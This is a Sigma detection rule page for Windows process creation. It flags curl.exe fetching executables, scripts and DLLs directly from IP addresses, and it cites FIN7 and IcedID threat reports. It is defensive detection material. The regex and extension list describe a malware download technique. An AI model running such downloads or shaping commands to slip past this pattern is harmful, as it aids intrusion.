Suspicious File Download From IP Via Curl.EXE

 1title: Suspicious File Download From IP Via Curl.EXE
 2id: 5cb299fc-5fb1-4d07-b989-0644c68b6043
 3status: test
 4description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
 5references:
 6    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
 7    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
 8    - https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt
 9author: Nasreddine Bencherchali (Nextron Systems)
10date: 2023-07-27
11tags:
12    - attack.execution
13logsource:
14    category: process_creation
15    product: windows
16detection:
17    selection_img:
18        - Image|endswith: '\curl.exe'
19        - OriginalFileName: 'curl.exe'
20    selection_ip:
21        CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
22    selection_http:
23        CommandLine|contains: 'http'
24    selection_flag:
25        CommandLine|contains:
26            - ' -O'  # covers the alias for --remote-name and --output
27            - '--remote-name'
28            - '--output'
29    selection_ext:
30        # Note: If you add more extensions please consider adding them also in 9cc85849-3b02-4cb5-b371-3a1ff54f2218
31        CommandLine|endswith:
32            - '.bat'
33            - '.bat"'
34            - '.dat'
35            - '.dat"'
36            - '.dll'
37            - '.dll"'
38            - '.exe'
39            - '.exe"'
40            - '.gif'
41            - '.gif"'
42            - '.hta'
43            - '.hta"'
44            - '.jpeg'
45            - '.jpeg"'
46            - '.log'
47            - '.log"'
48            - '.msi'
49            - '.msi"'
50            - '.png'
51            - '.png"'
52            - '.ps1'
53            - '.ps1"'
54            - '.psm1'
55            - '.psm1"'
56            - '.vbe'
57            - '.vbe"'
58            - '.vbs'
59            - '.vbs"'
60            - ".bat'"
61            - ".dat'"
62            - ".dll'"
63            - ".exe'"
64            - ".gif'"
65            - ".hta'"
66            - ".jpeg'"
67            - ".log'"
68            - ".msi'"
69            - ".png'"
70            - ".ps1'"
71            - ".psm1'"
72            - ".vbe'"
73            - ".vbs'"
74    condition: all of selection_*
75falsepositives:
76    - Unknown
77level: high

References

• FIN7 tradecraft seen in attacks against Veeam backup servers

  

  WithSecure Intelligence identified attacks which occurred in late March 2023 against internet-facing servers running Veeam Backup & Replication software. Our research indicates that the intrusion set used in these attacks has overlaps with those attributed to the FIN7 activity group. It is likely that initial access & execution was achieved through a recently patched Veeam Backup & Replication vulnerability, CVE-2023-27532.

  
  Read More

• iocs/FIN7VEEAM/iocs.csv at 344203de742bb7e68bd56618f66d34be95a9f9fc · WithSecureLabs/iocs

  

  Contribute to WithSecureLabs/iocs development by creating an account on GitHub.

  
  Read More

• IcedID/icedID_09.28.2023.txt at 8dd1e218460db4f750d955b4c65b2f918a1db906 · pr0xylife/IcedID

  

  Contribute to pr0xylife/IcedID development by creating an account on GitHub.

  
  Read More

Related rules

• AADInternals PowerShell Cmdlets Execution - ProccessCreation
• AADInternals PowerShell Cmdlets Execution - PsScript
• AMSI Bypass Pattern Assembly GetType
• APT29 2018 Phishing Campaign CommandLine Indicators
• AWS EC2 Startup Shell Script Change